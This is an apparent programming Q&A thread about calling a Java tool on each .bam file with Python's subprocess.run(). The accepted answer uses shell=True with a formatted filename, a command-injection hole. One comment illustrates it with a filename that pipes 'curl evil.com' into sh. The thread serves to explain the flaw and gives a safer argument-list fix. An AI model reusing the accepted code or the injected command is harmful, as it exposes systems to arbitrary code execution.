# Subprocess.run() inside loop

Tags: python, for-loop, subprocess

I would like to loop over files using subprocess.run(), something like:

```
import os
import subprocess

path = os.chdir("/test")
files = []
for file in os.listdir(path):
     if file.endswith(".bam"):
        files.append(file)

for file in files:
     process = subprocess.run("java -jar picard.jar CollectHsMetrics I=file", shell=True)
```

How do I correctly call the files?

Comment: Do *not* use `shell=True`. Find the absolute path to the `java` binary and call it with the file name.

Answer (score -1, accepted):

Seems like you might be over complicating it.

```
import os
import subprocess

path = os.chdir("/test")
for file in os.listdir(path):
     if file.endswith(".bam"):
        subprocess.run("java -jar picard.jar CollectHsMetrics I={}".format(file), shell=True)
```

Comment: This code suffers from a security vulnerability. What if there is a file `; curl evil.com | sh ; .bam` in `/test`?

Comment: This is only a risk if the folder is open to outside interaction. I answered the question within the framework of the users parameters.  If you have a better suggestion, then supply a better answer.

Answer (score 0):

`shell=True` is insecure if you are including user input in it. @eatmeimadanish's answer allows anybody who can write a file in `/test` to execute arbitrary code on your machine. This is a huge **security vulnerability**!

Instead, supply a list of command-line arguments to the `subprocess.run` call. You likely also want to pass in `check=True` – otherwise, your program would finish without an exception if the java commands fails!

```
import os
import subprocess

os.chdir("/test")
for file in os.listdir("."):
    if file.endswith(".bam"):
        subprocess.run(
            ["java", "-jar", "picard.jar", "CollectHsMetrics", "I=" + file], check=True)
```